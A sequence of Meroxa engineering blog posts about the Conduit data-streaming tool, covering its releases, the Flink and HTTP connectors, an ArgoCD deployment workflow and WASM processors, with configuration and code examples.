Read more about the error processor here.

`webhook.http`

We added the ability to specify headers for the webhook.http processor.

Read more about the webhook.http processor here.

`field.convert`

The field.convert processor can now convert data to a Go time.Time object. It supports converting unix nano timestamps or RFC3339 formatted dates.

Read more about the field.convert processor here.

`avro.encode` and `avro.decode`

These processors previously required users to run an external schema registry and configure the connection string for each processor. Now, they have been updated to use Conduit’s schema registry, eliminating the need for an external service.

Read more about the avro.encode and avro.decode processors here and here.

What’s next?

With the release of Conduit v0.11, we have reached an important milestone. However, there are still exciting features on the horizon. Here’s a glimpse of what’s coming next:

We plan to add more robust pipeline lifecycle management functionality directly into Conduit. Specifically, we will introduce the ability to configure a restart policy at the pipeline level in case of failures. This will enable recovery from transient errors, such as an external service being unreachable, even if the connector itself cannot handle such failures.
We acknowledge that the Conduit UI has lagged behind the features we’ve added over the past two years, limiting access to Conduit’s full potential. Instead, we focused on improving the internal capabilities and configuring them through configuration files. We think that Conduit is most useful as a tool that can be automated and configured programmatically, therefore we plan to remove the UI from Conduit entirely. In its place, we will add powerful CLI commands to simplify tasks such as bootstrapping new pipelines, exploring the contents of a running Conduit instance, and creating your own processors or connectors.
We plan to refactor the API and introduce the ability to export and import pipelines into configuration files. This will enhance the integration between the API and configuration management, making it easier to manage and deploy pipelines.

We invite you to participate in shaping the Conduit roadmap by joining our GitHub discussions or starting a new discussion yourself. Your feedback and ideas are crucial in helping us prioritize features that meet your needs.

Conclusion

Conduit v0.11 brings a host of new features and improvements that enhance the flexibility, usability, and performance of our data streaming platform. From comprehensive schema support to robust connector and processor enhancements, this release is designed to make data integration more seamless and efficient. We encourage you to upgrade to the latest version and explore these new capabilities. As always, we welcome your feedback and contributions to help shape the future of Conduit. Get involved by joining our Discord server and saying hello to the team behind Conduit!

Release Notes: Read the full release notes
Documentation: Explore the documentation

Announcing the New Conduit Platform by Meroxa

Dion Keeton — Tue, 18 Jun 2024 13:03:06 GMT

We are thrilled to introduce our latest offering, the Conduit Platform, which brings a host of new features and improvements designed to enhance your real-time data streaming experience, now powered by our robust Conduit open-source core. This transformation brings enhanced performance, scalability, and usability, coupled with access to over 100 connectors maintained by our dedicated open-source community. Here’s a closer look at what’s new and how it can benefit your data operations.

Unparalleled Performance and Isolation

The new Conduit Platform features a modular architecture that ensures enhanced performance and comprehensive data isolation. Unlike the previous shared data plane model, this approach significantly reduces system disruptions and enhances reliability. This isolation guarantees that your data operations remain unaffected by other tenants, providing a smoother and more efficient user experience.

Accelerated Feature Delivery

We can now ship features more quickly and directly to our customers. This means you’ll have access to the latest advancements and improvements without the delays typically associated with shared infrastructure. Our commitment to continuous innovation ensures that your data integration and transformation capabilities are always at the cutting edge.

Simplified Data Application Building

We’ve listened to our customers who expressed the need to leverage Conduit’s powerful utilities without the complexity of YAML configurations and custom code. Our redesigned dashboard now enables you to build end-to-end real-time data applications with a user-friendly, no-code interface. This intuitive design allows you to focus on what matters most—leveraging your data—without getting bogged down in technical details.

Enhanced Team Features

The new Conduit Platform also includes a suite of features designed specifically for teams. These enhancements include:

Basic Access Controls: Manage who can access and modify your data applications with ease.
Secrets Management: Securely store and manage sensitive information like API keys and passwords.
Single Sign-On (SSO): Simplify user authentication and enhance security with SSO integration.

And this is just the beginning—many more features are on the way to further empower your team and streamline your data operations.

Key Features

Effortless Point and Click Real-Time Data Pipelines

Experience the ease of building real-time data pipelines with Conduit Platform. Our intuitive point-and-click interface allows you to quickly set up and manage your data flows without the need for extensive coding knowledge. Transform your data integration process into a seamless and efficient operation.

Connect Any Source to Any Destination

With Conduit Platform, you can effortlessly connect any data source to any destination. Whether it's databases, cloud services, or enterprise applications, our platform ensures smooth and reliable data transfer across your entire ecosystem. Break down data silos and achieve unified data access and insights.

Low Code Data Transformation

Simplify your data movement tasks with our low-code approach. Conduit Platform provides powerful tools that allow you to design and implement complex data transformations with minimal coding. Enhance your workflows and gain valuable insights faster and more efficiently.

Get Started Today

The all-new Conduit Platform represents a significant leap forward in data integration and transformation. With its isolated tenant model, accelerated feature delivery, and enhanced team features, it’s designed to meet the evolving needs of modern data-driven organizations. Experience the future of data streaming with the Conduit Platform. Thank you for being a valued member of the Meroxa community. We look forward to supporting your success on this new and improved platform.

Stay tuned for more updates and detailed guides on how to make the most of the Conduit Platform. If you have any questions or need assistance, click here to request a demo. Let's build the future of data integration together!

Introduction to Meroxa's New Conduit Connector for Apache Flink

Haris Osmanagić — Mon, 17 Jun 2024 17:00:00 GMT

At Meroxa, we're excited to introduce the Conduit connector for Apache Flink, a powerful combination that significantly expands Flink’s capabilities. Apache Flink is renowned for its robust stream processing capabilities, while Conduit offers a lightweight and fast data streaming solution, simplifying the creation of connectors. By integrating these tools, we enhance the options available for real-time data processing.

How It Works

To leverage the robustness of Apache Flink’s Kafka connector, we have designed the Conduit connector to work seamlessly within Flink environments. Here’s a breakdown of the process:

Flink Source: Represents a Conduit pipeline that reads from a data source and writes to a Kafka topic.
Flink Job: Processes data from the Kafka topic, transforming it as needed, and writes the processed data to another Kafka topic.
Sink: A Conduit pipeline reads data from the Kafka topic and writes it to the final destination.

Our Goal

To illustrate the capabilities, we'll demonstrate a job that reads data from Conduit’s generator connector, adds metadata, and writes the data to a file.

Requirements

To get started, you’ll need the following:

Java 11 or higher
Maven
Conduit (refer to our documentation)
Kafka (ensure auto.create.topics.enable is set to true)

Setup

First, create a new Maven project and include the necessary dependencies:

<dependencies>
   <dependency>
     <groupId>com.meroxa</groupId>
     <artifactId>conduit-flink-connector</artifactId>
     <version>0.0.1-SNAPSHOT</version>
   </dependency>
   <dependency>
     <groupId>org.apache.flink</groupId>
     <artifactId>flink-streaming-java</artifactId>
     <version>1.17.2</version>
   </dependency>
   <dependency>
     <groupId>org.apache.flink</groupId>
     <artifactId>flink-connector-kafka</artifactId>
     <version>1.17.2</version>
   </dependency>
</dependencies>

Next, write the main class and get a new execution environment for your Flink job:

var env = StreamExecutionEnvironment.getExecutionEnvironment();

Adding a Source

Each Conduit source in an Apache Flink job maps to a connector on a running Conduit instance. In the conduit-flink-connector, this is represented with io.conduit.flink.ConduitSource:

// (1) Used to correlate all the pipelines which are part of this app
String appId = "conduit-flink-demo";
// (2) Create a new Conduit source
KafkaSource<Record> source = new ConduitSource(
   appId,
   // (3) Specify the plugin
   "generator",
   // (4) Configure the plugin
   Map.of(
     "recordCount", "1",
     "format.type", "structured",
     "format.options.id", "int",
     "format.options.name", "string"
   )
   // (5) Build a KafkaSource instance
).buildKafkaSource();

Breaking It Down

Application ID: Specifies an ID for the Flink job. The Conduit connector uses this ID as part of the Conduit pipeline IDs it creates.
Create ConduitSource: Instantiates a new ConduitSource.
Specify Connector: Choose the Conduit connector to be used. Conduit comes with a few built-in connectors, and additional can be installed. In this case, the built-in generator connector.
Configure Connector: A connector’s configuration is usually part of the README. The configuration we have will make the connector produce one record, that has a structured payload, with two fields: an ID and a name.
Build KafkaSource: Builds the KafkaSource instance.

Writing a Map Transformation

Create a DataStream and add a map transformation to it. The transformation accepts an io.conduit.opencdc.Record and returns an io.conduit.opencdc.Record. Here, we add metadata to each record:

DataStream<Record> in = env.fromSource(
     source,
     WatermarkStrategy.noWatermarks(),
     "generator-source"
   ).map((MapFunction<Record, Record>) value -> {
     value.getMetadata().put("processed-by", "flink");
     return value;
   });

Adding a Sink

Now, write the data into a file:

var sink = new ConduitSink(
   appId,
   "file",
   Map.of("path", "/tmp/file-destination.txt")
).buildKafkaSink();

Connect and Execute

Connect the stream and trigger program execution:

in.sinkTo(sink);
env.execute("Conduit + Apache Flink demo");

Putting It All Together

var env = StreamExecutionEnvironment.getExecutionEnvironment();
String appId = "conduit-flink-demo";
KafkaSource<Record> source = new ConduitSource(
   appId,
   "generator",
   Map.of(
     "recordCount", "1",
     "format.type", "structured",
     "format.options.id", "int",
     "format.options.name", "string"
   )
).buildKafkaSource();

DataStream<Record> in = env.fromSource(
   source,
   WatermarkStrategy.noWatermarks(),
   "generator-source"
).map((MapFunction<Record, Record>) value -> {
   value.getMetadata().put("processed-by", "flink");
   return value;
});

var sink = new ConduitSink(
   appId,
   "file",
   Map.of("path", "/tmp/file-destination.txt")
).buildKafkaSink();

in.sinkTo(sink);
env.execute("Conduit + Apache Flink demo");

Ensure that Conduit and Kafka are running before executing the job. Running the application will generate the following records:

{
  "position": "eyJHcm91cElEIjoiNTU0MTU0NTktOTQ5Ny00OWYyLTgzMGUtMjUyY2EwOTE4YTY5IiwiVG9waWMiOiJmbGluay10b3BpYy1zaW5rIiwiUGFydGl0aW9uIjowLCJPZmZzZXQiOjB9",
  "operation": "create",
  "metadata": {

  },
  "key": {

  },
  "payload": {

  	"id": 3758801242992936400,
  	"name": "petrifier"

  }
}

What we see is a typical OpenCDC record. The .Payload.After field contains an id and a name that were created in the generator connector. Looking at the metadata, you’ll notice "processed-by": "flink" that comes from the map function.

Next Steps

Examine the topics used (flink-topic-source and flink-topic-sink), modify the map transformation, and observe the updated results. For more examples, including PostgreSQL to Snowflake, visit our GitHub repository.

We'd love to hear your feedback on the connector. Join us on Discord, GitHub Discussions, or Twitter/X for more conversations! Also, don't forget to request a demo to learn about our new Conduit Platform!

Simplifying Kubernetes Deployments with ArgoCD

Samir Ketema — Mon, 10 Jun 2024 10:00:00 GMT

At Meroxa, we recently adopted ArgoCD as our go-to continuous delivery (CD) tool, allowing us to easily leverage the GitOps framework to deploy Kubernetes resources and services. We utilize ArgoCD to simplify the management of tenant instances of our platform, deployed within a Kubernetes cluster. Before we expand further, here’s a quick overview of the technologies used in this blog post:

ArgoCD Setup at Meroxa

ArgoCD's primary role in our platform is to deploy and manage thousands of distinct, “mini” Conduit platform instances, which we call 'tenants'. This setup comprises of:

Supervisor Application: This is a single ArgoCD application that creates and manages Meroxa tenants. This involves creation of Kubernetes namespaces and ArgoCD Applications for each tenant, supports deployment into private VPCs, and ensures cloud-agnostic deployments across AWS, Azure, or Google Cloud. It’s also capable of deploying the Conduit platform in air-gapped environments, as well as deploying tenants to different computer architectures.
Tenant ArgoCD Applications: For each tenant on the platform, an ArgoCD application is created. The tenant ArgoCD application points to a Helm chart containing all components of the tenant platform instance, including the Conduit platform, which performs Meroxa’s core stream processing. Additionally, it encapsulates ArgoCD Applications for supporting services in the tenant namespace, such as Grafana and Loki.

Diagram of a Tenant ArgoCD Application. Note that there is a hierarchy, where the Conduit Platform is a child App of the Tenant ArgoCD App.

This encapsulation provides us simplicity for managing all of these Kubernetes resources - Deployments, Pods, Ingress, etc. All the setup application needs to do is invoke the Kubernetes API once to create the Tenant ArgoCD Application, which is provided as a Kubernetes Custom Resource by ArgoCD.

The tenant ArgoCD Applications have the repo pointed to the GitHub repository hosting the Conduit Platform code. The path is pointed to a directory containing the helm chart for the specific environment - we’ll dig into that nuance further down below. Lastly, the targetRevision is pointed to HEAD, so we can ensure the helm chart from the latest commit will be reflected. ArgoCD will automatically sync.

Once the synchronization process runs, the ArgoCD controller will be responsible for reconciling the desired state from the helm chart into the actual state of Kubernetes resources - including the Conduit Platform’s Pod, Deployment, and Ingress. For more information on the sync process in ArgoCD, check out the documentation here.

PR → Staging → Production

Our deployment workflow is designed to keep the deployment process reliable and efficient. Here’s how we navigate from staging to production using ArgoCD:

Staging CI Workflow

The journey begins when a PR is merged into the main branch, triggering our staging CI GitHub workflow. This performs the following:

Example values-images.yaml file, containing a docker image tag for the conduit platform:

imageTag: av8344892b23h281h5c50e863a93c2b231hd8ce3

Production CI Workflow

The production workflow mostly following the staging process, but with two key differences:

Promote The Staging Chart + Docker Image: Instead of building a new image for production, the production workflow promotes the changes from the staging/ directory to the production/ directory.
Manual PR Approval for Production: Unlike staging, the PR for production deployment requires manual approval. This step ensures an extra layer of scrutiny and control before changes impact our production environment.

gitGraph LR:
     checkout main
     commit
     commit
     branch samir/add-new-migration
     commit id: "samir adds new migration"
     checkout main
     merge samir/add-new-migration id:"1j38h72"
     branch automated-value-files-updates-1j38h72
     commit id: "[Automated] update staging directory values files to '1j38h72'"
     checkout main
     merge automated-value-files-updates-1j38h72 id:"j81h78t"
     branch automated-value-files-updates-prod-1j38h72
     commit id: "[Automated] update production directory values files to '1j38h72'"
     checkout main
     merge automated-value-files-updates-prod-1j38h72

gitGraph LR:
     checkout main
     commit
     commit
     branch samir/add-new-migration
     commit id: "samir adds new migration"
     checkout main
     merge samir/add-new-migration id:"1j38h72"
     branch automated-value-files-updates-1j38h72
     commit id: "[Automated] update staging directory values files to '1j38h72'"
     checkout main
     merge automated-value-files-updates-1j38h72 id:"j81h78t"
     branch automated-value-files-updates-prod-1j38h72
     commit id: "[Automated] update production directory values files to '1j38h72'"
     checkout main
     merge automated-value-files-updates-prod-1j38h72

Challenges and Learnings

Our introduction to ArgoCD was a bit of a learning curve. Here are some challenges we faced and the insights we gained:

Managing Image Tags and PRs: Initially, pinning image tags with environment-specific deployments was tricky. We learned to simply point targetRevision to HEAD, and duplicate charts per environment in different directories. Here were the alternatives we avoided:
At first, we were inclined to point targetRevisions directly to specific commits, but quickly this proved to be problematic, as changes to helm charts and values could bypass staging and land directly into production.
We also explored tracking separate staging and production branches, but decided against it to reduce complexity and potential conflicts.
Automated PR Management: Automated PRs, especially for production, can create a lot of noise and can quickly pile up if the team is not paying attention to them. This is a drawback of the approach - we decided it was worth the tradeoff for the deployment simplicity.
File Protection: We implemented PR checks to protect values-images.yaml files and helm charts in staging and production directories from manual alterations, for integrity of the deployment process.

Future Improvements

Looking forward, we aim to improvement our ArgoCD setup:

Slack Notifications: To enhance our monitoring, we're considering integrating Slack notifications to alert the team when syncs in Staging and Production are complete.
Multi-Cluster Capabilities: Utilizing ArgoCD's multi-cluster feature could be useful, especially for managing multiple production clusters in different regions.
Scaling ArgoCD Controllers: To improve reliability, we’re working on scaling up the number of ArgoCD controllers, in case of pod failures. ArgoCD has been a game-changer for us at Meroxa. It has streamlined our deployment process, making it more efficient and scalable. We're excited to dive deeper into ArgoCD and fully leverage its capabilities. Have you thought about deploying applications with ArgoCD? Are you working on stream processing or data engineering problems? Join our community and chat with us.

Simplifying Data Integration: Unleashing the Power of Conduit SDK and Connector Template

William Hill — Wed, 08 May 2024 16:22:50 GMT

Introducing Conduit SDK

Conduit's SDK is designed to facilitate the creation of connectors in any programming language that supports gRPC, with a particular emphasis on Go. This SDK simplifies the process of building connectors, offering developers the tools necessary to integrate seamlessly with Conduit’s data streaming platform.

Leveraging the Conduit Connector Template

For those looking to jumpstart the development of a Conduit connector, the Conduit Connector Template is an invaluable resource. This template provides a foundational project structure, complete with essential utilities like GitHub Actions for CI/CD processes and a Makefile for routine tasks. It includes:

Skeleton code for the connector's configuration, source and destination
Example unit tests
A Makefile with commonly used targets
A GitHub workflow to build the code and run the tests
A GitHub workflow to run a pre-configured set of linters
A GitHub workflow which automatically creates a release once a tag is pushed
A dependabot setup which checks your dependencies for available updates and merges minor version upgrades automatically
Issue and PR templates
A README template

Developing Your Connector

Whether creating a source or destination connector, Conduit’s tools support you every step of the way. The process involves:

Cloning the template and setting up the initial configuration.
Customizing the source and destination logic to fit your specific data integration needs.
Utilizing the paramgen tool to generate configuration parameter mappings automatically.

Practical Steps to Implementation

Initialization: Start by using the template directly from GitHub to ensure all configurations are set.
Customization: Adapt the provided skeleton code to meet the specific requirements of your data source or destination.
Testing and Deployment: Utilize the built-in testing framework and CI/CD pipelines to ensure your connector is robust and ready for deployment.

By integrating Conduit’s SDK and leveraging the provided templates, developers can significantly reduce the complexity and time required to bring a functional data connector to life.

For those interested in diving deeper into the capabilities of Conduit SDK and how you can efficiently build and deploy your own connectors, read the full documentation here.

Conduit 0.10 comes with Multiple collections support

Haris Osmanagić — Mon, 29 Apr 2024 22:37:15 GMT

We’re happy to announce another release of our open-source data integration tool Conduit: 0.10. This one comes only a month after our last release. We thought the new native support for multiple collections was so important that we wanted to release it to our users as quickly as possible.

Multiple collections support

We take our users' feedback very seriously, and something we kept hearing was the need to have the ability to connect and integrate multiple data collections simultaneously. While this could be accomplished in some cases by creating multiple pipelines, it was far from ideal and not very scalable.

What do we mean by “collections”? It depends on the resource that Conduit is interacting with. In a database, a collection is a table, in Kafka it’s a topic, in Elasticsearch it’s an index. We use “collection” as the catch-all term for structures that contain a group of related records.

With this latest release, we believe it will be easier for connector developers to expand their functionality and add support for multiple collections.

To facilitate connectivity between connectors, we included a new metadata field named opencdc.collection to indicate the collection from which a record originated. For example, if a record was read from a topic named users, the OpenCDC record would look like this:

{
  "operation": "create",
  "metadata": {
    "opencdc.collection": "users",
    "opencdc.readAt": "1663858188836816000",
    "opencdc.version": "v1",
    "conduit.source.plugin.name": "builtin:kafka",
    "conduit.source.plugin.version": "v0.8.0"
  },
  ...
}

The goal of this feature is to make it easy to route records in a pipeline. What in the past would have taken several pipelines, can now be a single pipeline. However, that’s not the only way to route records in Conduit. Read more about other ways to route records in Conduit.

Connectors with support for multiple collections

To demonstrate the capability of having multiple collections in Conduit, we decided to start with some of our built-in connectors, which are included as part of the Conduit binary.

Kafka connector

This connector now supports the ability to read and write to multiple topics. When configuring Kafka as a source, you can make use of the topics configuration option to include a list of Kafka topics from which records will be read:

connectors:
  - id: kafka-source
    type: source
    plugin: builtin:kafka
    settings:
      # Read records from topic1 and topic2
      topics: topic1,topic2
      ...

When configuring Kafka as a destination, you can specify a target topic based on data taken from the record being processed. The default value of the topic parameter is the Go template {{ index .Metadata "opencdc.collection" }}, which means that records will be routed to the topic based on the collection they come from. You can change the parameter to take data from a different field or use a static topic.

connectors:
  - id: kafka-source
    type: destination
    plugin: builtin:kafka
    settings:
      # Route record to topic based on record metadata field "opencdc.collection"
      topic: '{{ index .Metadata "opencdc.collection" }}'
      ...

Postgres connector

In the case of configuring a Postgres connector as a source, we expanded support to reading from multiple tables in the two CDC modes (logical replication and long polling) using the tables configuration option indicating the tables you would like to read from comma separated.

Additionally, we have also added the ability to read all tables from a public schema using a wildcard option (*). We believe this option will come in handy in the following situations:

Initial data ingestion: this way you’ll ensure the connector will capture all available tables, reducing the setup time and ensuring no tables are missed.
Schema changes: if new tables are added, the connector will automatically pick up new tables eliminating the need for manual updates.
Data discovery: this can be helpful to facilitate data discovery detecting changes from all tables, which can be useful when exploring a new data source.
Reducing maintenance: the need to maintain a list of specific tables is eliminated, making the maintenance of the connector easier.

Here’s an example of a pipeline configuration file using Postgres as a source:

connectors:
  - id: pg-source
    type: source
    plugin: builtin:postgres
    settings:
      tables: * # All tables in schema 'public'
      url: "postgresql://user:password@localhost:5432/exampledb"

As with our Kafka connector, the Postgres destination, defaults to setting the destination table as the value of the opencdc.collection metadata field. This can also be customized if you need to. Here’s an example:

connectors:
  - id: pg-destination
    type: destination
    plugin: builtin:postgres
    settings:
      # Route record to table based on record metadata field "opencdc.collection"
      table: '{{ index .Metadata "opencdc.collection" }}'
      url: "postgresql://user:password@localhost:5432/exampledb"

Generator connector

Multiple collections support in the generator enables the generator to emit records with different formats. For example, let’s assume we want to simulate reading from two collections. One contains data about users and the other data about orders. With the generator, that can be accomplished using the following configuration:

connectors:
  - id: example
    type: source
    plugin: builtin:generator
    settings:
      # Global settings
      rate: 1000
      # Collection "users" produces structured records with fields "id" and "name".
      # All user records have the operation 'create'.
      collections.users.format.type: structured
      collections.users.format.options.id: int
      collections.users.format.options.name: string
      collections.users.operations: create
      # Collection "orders" produces raw records with fields "id" and "product".
      # Order records have one of the specified operations chosen randomly.
      collections.orders.format.type: raw
      collections.orders.format.options.id: int
      collections.orders.format.options.product: string
      collections.orders.operations: create,update,delete

📝 One of the new features is to generate different operations for each record!

Bonus: Dynamic configuration parameters in connectors

With the latest release of the connector SDK, we introduced dynamic configuration parameters. A configuration parameter can now contain a wildcard in its name (*), which can be filled out in the pipeline configuration provided by the user.

We already use this feature in the generator connector to specify multiple collections with separate formats. For instance, the configuration parameter collections.*.format.type can be provided multiple times, where * is replaced with the collection name. We also use it to configure a list of fields generated by the connector using the parameter collections.*.format.options.*.

connectors:
  - id: example
    type: source
    plugin: builtin:generator
    settings:
      # Global settings
      rate: 1000
      # Collection "users" produces structured records with fields "id" and "name".
      collections.users.format.type: structured
      collections.users.format.options.id: int
      collections.users.format.options.name: string
      # Collection "orders" produces raw records with fields "id" and "product".
      collections.orders.format.type: raw
      collections.orders.format.options.id: int
      collections.orders.format.options.product: string

You can start using this feature in your own connectors right away!

We’d love your feedback!

Check out the full release notes on the Conduit Changelog. What do you think about multiple collections and dynamic configuration parameters? Is there something you think would be great to have in Conduit? Start a GitHub Discussion, join us on Discord, or reach out via Twitter!

Inside Meroxa’s Hack Week: Pioneering Data Solutions with In-House Innovation

DeVaris Brown — Wed, 17 Apr 2024 04:38:15 GMT

Welcome to an insider’s view of Meroxa’s Hack Week, a time when our development team showcases its innovative prowess by utilizing our comprehensive data platform. This tradition not only highlights our team’s dedication to our product but also demonstrates the extensive possibilities that Meroxa unlocks for data ingestion, transformation, streaming, and orchestration.

The Essence of Hack Week at Meroxa

Hack Week at Meroxa is a celebration of our ability to blend technical expertise with creative innovation, developing applications that extend beyond our standard offerings. It is a period of intense exploration, learning, and boundary-pushing, which ultimately enhances our platform's capabilities.

Showcasing This Quarter’s Innovative Projects

Conduit Connector Kafka Broker

A standout project by Lovro introduced an experimental Kafka broker connector, enhancing our data integration capabilities by enabling direct data production from Kafka producers.

Disaster Recovery with Litestream

Samir’s initiative started with scaling Pocketbase and evolved into utilizing Litestream for cutting-edge disaster recovery solutions, exemplifying Meroxa’s flexibility.

Generic HTTP Connector for Conduit

Maha identified and filled a crucial gap in our service offerings by developing a production-grade HTTP source and destination connector for Conduit, significantly advancing our connectivity solutions.

Google Contacts Backup Tool

Leveraging the new HTTP connector, Haris developed a tool for backing up Google Contacts, illustrating the practical applications of Meroxa’s platform for everyday data management challenges.

Realtime MLOps with Milvus and WASM Vector Embedding Processor

James used our Conduit Connector and Processor SDKs to build a real-time MLOps pipeline that transforms Postgres data into vector embeddings, showcasing the platform’s support for sophisticated data operations.

Facilitating Customer Proof of Concept Demos

Anna’s work on tailored demos for Clickhouse integration to Google Pub/Sub and Snowflake to Hubspot demonstrates Meroxa’s capability in simplifying data movement, essential for reverse ETL processes and aiding sales efforts.

Inspiring the Future of Data Innovation

As we reflect on the achievements of this quarter’s Hack Week, we are inspired by the limitless possibilities within Meroxa. The projects highlighted are a source of inspiration for anyone looking to push the boundaries of data technology.

Whether you are starting your data journey or looking to enhance your expertise, we invite you to sign up for a demo or join our Discord community to see how Meroxa is leading innovation in data solutions. Embrace the future of data with Meroxa and discover how our platform can empower your next project. Here’s to continuing to innovate and redefine the boundaries of what’s possible with data!

Sign Up for a Demo | Join Our Discord Community

Introducing the New HTTP Connector for Conduit: Streamline Your Data Flow

Maha Hajja — Fri, 12 Apr 2024 23:44:02 GMT

In the evolving landscape of data integration, staying ahead means continuously enhancing the versatility and effectiveness of our tools. That’s why we’re thrilled to announce the latest addition to Conduit: the HTTP Connector. This powerful plugin not only broadens the scope of Conduit’s capabilities but also simplifies the process of pulling and pushing data over HTTP.

Why the HTTP Connector?

A generic HTTP connector allows you to connect to any HTTP-based service or API. This flexibility is essential in modern software development, where systems often need to communicate with a wide range of external services, from internal APIs to third-party platforms.

By having both the HTTP source and destination connectors, you gain the ability to effortlessly transfer data between any Conduit source connector to an HTTP endpoint, and vice versa.

Building and Testing Made Simple

Developed with ease of use in mind, building and testing the HTTP Connector is straightforward:

Download or Build: Download the connector’s release binary file that is ready to use, or use the simple make build command that compiles the connector from source, preparing it for integration into your Conduit pipeline.
Testing: With make test, you can run through all the unit tests to ensure the connector functions correctly.

Source Connector: How It Works

The source side of the HTTP Connector pulls data at regular intervals specified by the pollingPeriod. It’s smartly designed to enhance flexibility, allowing you to specify request methods (GET, HEAD, OPTIONS), headers, and parameters to tailor the data request to your needs. Particularly noteworthy is the use of the OPTIONS method, which appends the returned options directly to the record's metadata, enriching the data ingested into Conduit.

Configuration options:

URL: The endpoint from which data is fetched.
Method: Choose from GET, HEAD, or OPTIONS to match the endpoint’s requirements.
Headers and Params: Further customize your requests.
Polling Period: Set how frequently the connector fetches data, with a default of every 5 minutes.

Example:

Using the HTTP source connector, you can pull data from any HTTP API and push it to any Conduit destination connector, check our Conduit connectors list. Let’s take for example a pipeline that pulls orders from Shopify and pushes them into a file destination connector:

Pipeline Configuration File

Create a folder called pipelines at the same level as your Conduit binary. Inside of that folder create a yaml file and copy these configurations over.

version: 2.2  pipelines:    - id: shopify-pipeline      status: running      connectors:        - id: shopify-orders          type: source          plugin: standalone:http          settings:            url: <https://cd8206-5c.myshopify.com/admin/api/2024-04/orders.json> # your shopify API to get orders.            headers: X-Shopify-Access-Token:${SHOPIFY_ACCESS_TOKEN} # reference to an env-var that has your access token.            pollingPeriod: 30m # pull data from the URL every 30 minutes.        - id: file-dest          type: destination          plugin: builtin:file          settings:            path: orders.txt      processors:         - id: decode-response          # use a builtin processor that decodes the pulled data into JSON.          plugin: json.decode           settings:            field: .Payload.After

Now run Conduit using ./conduit, and see the magic!

This pipeline will pull the Shopify orders from the API every 30 minutes, parse the response into JSON, and then write the orders into the destination file.

Check Pipeline Configuration Files for more details around the pipeline configuration files and how to run them.

Destination Connector: Pushing Data Forward

On the flip side, the destination connector takes data processed in Conduit and pushes it to the specified HTTP endpoint. Like its source counterpart, it allows for detailed configuration, including request methods suitable for creating or modifying resources (POST, PUT, DELETE, PATCH). This opens up a myriad of possibilities for integrating with APIs across the web.

Configuration options:

URL: The endpoint to which data is sent.
Method: Supported methods include POST, PUT, DELETE, and PATCH, providing flexibility based on the API’s requirements.
Body Manipulation: Through Conduit's built-in or standalone processors, customize the data format to fit the destination's needs perfectly.

Example:

Using the HTTP destination connector, you can pull data from any Conduit source connector and push it to an HTTP API, check our Conduit connectors list. Let’s take for example a pipeline that pulls orders from a Generator source connector and pushes them into the Shopify API to add products:

Pipeline Configuration File

Create a folder called pipelines at the same level as your Conduit binary. Inside of that folder create a yaml file and copy these configurations over.

version: 2.2  pipelines:    - id: shopify-pipeline      status: running      connectors:        - id: generator-src          type: source          plugin: builtin:generator          settings:            format.type: structured            format.options: "title:string,body_html:string,vendor:string,product_type:string,status:string"            readTime: 1m # generate a new product every minute.        - id: shopify-products          type: destination          plugin: standalone:http          settings:            url: <https://cd8206-5c.myshopify.com/admin/api/2024-04/products.json> # your shopify API to add products.            headers: X-Shopify-Access-Token:${SHOPIFY_ACCESS_TOKEN} # reference to an env-var that has your access token.

Run Conduit using ./conduit as we did in the last example, and notice the new products generated by the source and pushed to Shopify. Check Pipeline Configuration Files for more details.

Seamless Integration with Your Data Ecosystem

The HTTP Connector is more than just a plugin; it’s a gateway to integrating a vast array of web services and APIs directly into your data pipelines. Whether you’re aggregating data from multiple sources for analysis or updating external systems with processed data, the HTTP Connector streamlines these interactions, making your data workflows more efficient and effective.

We invite you to explore the HTTP Connector and see firsthand how it can transform your data integration strategies. For more details about Conduit, visit our Conduit’s GitHub page. To get in touch join our discord channel and let us know if you have any questions.

Stay tuned for more updates as we continue to enhance Conduit, making it the most versatile and user-friendly data integration platform available. Sign up for a demo.

Introducing Conduit 0.9: Revolutionizing Data Processing

Simon Lawrence — Fri, 22 Mar 2024 16:19:19 GMT

We're thrilled to unveil the latest version of Conduit! This update, Conduit 0.9, marks a significant milestone in our journey, offering more flexibility and power in data processing than ever before. The development of this release focused on incorporating valuable user feedback, particularly around enhancing processor functionality, to provide a seamless and more efficient experience.

Elevating Data Processing with Advanced Processor Capabilities

In previous versions of Conduit, manipulating records was confined to our built-in processors or custom code within the pipeline configuration file, using a JavaScript processor. This approach, while functional, was not the most user-friendly or flexible. Taking your feedback to heart, we've completely overhauled our processor framework in Conduit 0.9, introducing support for standalone processors. This update opens up new possibilities for data manipulation, allowing you to write custom processors in the language of your choice, thanks to our new support for Web Assembly (WASM) processors.

Introducing Web Assembly Processors for Flexible Data Processing

The flexibility to process data with Web Assembly Processors is a game-changer. For instance, utilizing Go with our new conduit-processor-sdk allows for unprecedented adaptability in processing methods. However, the choice of language is yours, with options like C#, Rust, or Kotlin—all compatible with Web Assembly. For a deeper dive into implementing standalone processors, our "How it works" guide provides comprehensive insights.

Example: Creating a Simple Processor in Go

Below is a straightforward example of a Go-based processor. This custom processor adds a processed field to each record, showcasing the ease of enhancing data with Conduit 0.9.

//go:build wasm    package main    import (      "context"        "github.com/conduitio/conduit-commons/opencdc"      sdk "github.com/conduitio/conduit-processor-sdk"  )    func main() {      sdk.Run(sdk.NewProcessorFunc(          sdk.Specification{Name: "simple-processor", Version: "v1.0.0"},          func(ctx context.Context, record opencdc.Record) (opencdc.Record, error) {              record.Payload.After.(opencdc.StructuredData)["processed"] = true              return record, nil          },      ))

Compiling our New Processor

After writing your processor, a simple compilation step prepares it for integration into your Conduit pipeline. The process involves setting specific environment variables for the Go compiler to target WASM. GOARCH=wasm GOOS=wasip1

GOARCH=wasm GOOS=wasip1 go build -o simple-processor.wasm main.go

Once compiled, your simple-processor.wasm is ready to be deployed within Conduit by copying to the ./processorsdirectory next to our conduit binary.

Using our new processor in a pipeline

Utilizing the new processor involves referencing it within your Conduit pipeline configuration, as demonstrated in our example layout.

We’ll have the generator connector create records with the form:

{    "addr": "string c5c5d54b-e380-48e0-b24b-444b760a66f3",    "id": 1884616843,    "name": "string 246def2a-ac48-416c-b3e7-01fcb77c52a2",    "zip": "string 2f1f462e-1dfa-4066-a1d7-03370227d672"  }

Our processor will add a new processed field and then we’ll write that out to a file.

Here’s the Conduit pipeline configuration file for actually creating the pipeline in Conduit.

